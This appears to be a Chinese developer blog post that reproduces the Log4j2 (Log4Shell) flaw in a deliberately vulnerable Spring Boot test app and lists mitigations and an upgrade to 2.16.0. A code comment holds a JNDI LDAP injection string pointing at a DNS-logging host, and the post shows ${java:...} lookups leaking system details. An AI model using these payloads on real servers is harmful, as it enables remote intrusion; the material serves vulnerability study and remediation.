SpringBoot复现log4j2漏洞
工程搭建及环境
pom.xml
<parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.6.1</version> </parent> <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-logging</artifactId> </exclusion> </exclusions> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-log4j2</artifactId> <version>2.1.1.RELEASE</version> </dependency> </dependencies>复制代码
java环境 jdk1.8
java version "11.0.13" 2021-10-19 LTS Java(TM) SE Runtime Environment 18.9 (build 11.0.13+10-LTS-370) Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.13+10-LTS-370, mixed mode)复制代码
web接口编写
@RestController public class TestController { private static final Logger logger = LogManager.getLogger(TestController.class); /** * ${java:vm} 打印 :Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode) * <p> * <p> * http://www.dnslog.cn/ * ${jndi:ldap://7yqrz4.dnslog.cn} * * @param str * @return */ @PostMapping("/test") public String test(@RequestBody String str) { logger.info("str={}", str); return "return=" + str; } }复制代码
测试漏洞
java:vm为什么会打印?debug进去看看,路径:org.apache.logging.log4j.core.lookup.JavaLookup#lookup
发现key有不少,挨个试下:
${java:vm} Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode) ${java:locale} default locale: zh_CN, platform encoding: UTF-8 ${java:hw} processors: 4, architecture: x86_64-64 ${java:os} Mac OS X 10.14.6 unknown, architecture: x86_64-64 ${java:version} Java version 1.8.0_162 ${java:runtime} Java(TM) SE Runtime Environment (build 1.8.0_162-b12) from Oracle Corporation复制代码
DNSLog www.dnslog.cn/
应对方案 ,受影响版本:Apache Log4j 2.x <= 2.14.1
jvm参数 -Dlog4j2.formatMsgNoLookups=true
修改配置 log4j2.formatMsgNoLookups=True
系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true
升级>=2.16.0 mvnrepository.com/artifact/or…
如果是依赖spring-boot-starter-log4j2
pom.xml <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-log4j2</artifactId> <version>2.1.1.RELEASE</version> <!--先排除--> <exclusions> <exclusion> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> </exclusion> <exclusion> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> </exclusion> </exclusions> </dependency> <!--再手动添加--> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.16.0</version> </dependency> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.16.0</version> </dependency>
作者:javanull
链接:https://juejin.cn/post/7041843601118068773